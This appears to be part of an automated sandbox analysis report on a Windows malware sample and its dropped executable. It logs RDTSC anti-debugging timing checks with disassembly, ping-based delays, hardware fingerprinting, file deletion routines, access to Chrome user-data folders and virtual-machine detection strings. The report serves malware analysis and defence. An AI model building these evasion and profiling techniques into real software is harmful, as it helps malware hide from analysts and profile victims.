Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFB7A second address: 00000000004EFB9B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBA1 second address: 00000000004EFBC1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 004F06A6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBC7 second address: 00000000004EFBEA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C681h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 004EFED6h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFBF0 second address: 00000000004EFEDD instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C682h 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFEE3 second address: 00000000004EFF03 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C682h 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF09 second address: 00000000004EFF31 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C684h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF37 second address: 00000000004EFF56 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFF5C second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C38C729h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0034 second address: 00000000004F0062 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C685h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F108C38C889h 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0068 second address: 00000000004F0085 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F008B second address: 00000000004F00A5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00AB second address: 00000000004F00C7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00CD second address: 00000000004F00EF instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C682h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F00F5 second address: 00000000004F0116 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C680h 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F011C second address: 00000000004F0142 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C686h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0148 second address: 00000000004F0167 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F016D second address: 00000000004F0188 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Bh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F018E second address: 00000000004F01B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C686h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F01B9 second address: 00000000004F01DA instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C681h 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F01E0 second address: 00000000004F0203 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C683h 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F0209 second address: 00000000004F0226 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F022C second address: 00000000004EFF9F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F108C38C3C8h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFA5 second address: 00000000004EFFC3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFC9 second address: 00000000004EFFE5 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004EFFEB second address: 00000000004F0007 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C67Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	RDTSC instruction interceptor: First address: 00000000004F000D second address: 00000000004F002E instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F108C38C684h 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc

Uses ping.exe to sleep

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_004EFAF0 rdtsc

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: _memset,GetAdaptersInfo,_memset,_sprintf,CryptAcquireContextW,CryptCreateHash,CryptHashData,_memset,CryptGetHashParam,CryptGetHashParam,CryptGetHashParam,_sprintf,CryptDestroyHash,CryptReleaseContext,

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_100204C0

Source: C:\Users\user\Desktop\N1yprTBBXs.exe TID: 6576	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe TID: 6928	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe TID: 6992	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00410120 _memset,PathCombineW,_memset,FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,FindClose,
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00413360 _memset,_memset,PathCombineW,FindFirstFileW,_memset,PathCombineW,DeleteFileW,GetLastError,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,MoveFileExW,
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1001A170 FindFirstFileA,FindClose,

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\

Source: 6272167835D47591.exe, 00000002.00000003.284319161.0000000004159000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 6272167835D47591.exe, 00000004.00000003.266530932.0000000002E21000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}
Source: 6272167835D47591.exe, 00000004.00000002.279544410.0000000002B39000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}q
Source: 6272167835D47591.exe, 00000002.00000003.284588878.000000000415F000.00000004.00000001.sdmp	Binary or memory string: WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 6272167835D47591.exe, 00000002.00000003.287653731.0000000004131000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: 6272167835D47591.exe, 00000002.00000003.263131857.0000000002EA1000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}&>3
Source: 6272167835D47591.exe, 00000002.00000003.284319161.0000000004159000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.266653982.0000000002B34000.00000004.00000040.sdmp	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: ecv37E8.tmp.9.dr	Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20210130T013815Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=3a4d640dea36471a8ac5b7161018101b&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=838503&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=838503&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 6272167835D47591.exe, 00000004.00000002.274005662.000000000019B000.00000004.00000010.sdmp	Binary or memory string: VMware Virtual disk 2.0
Source: 6272167835D47591.exe, 00000002.00000003.285054879.0000000004166000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}O
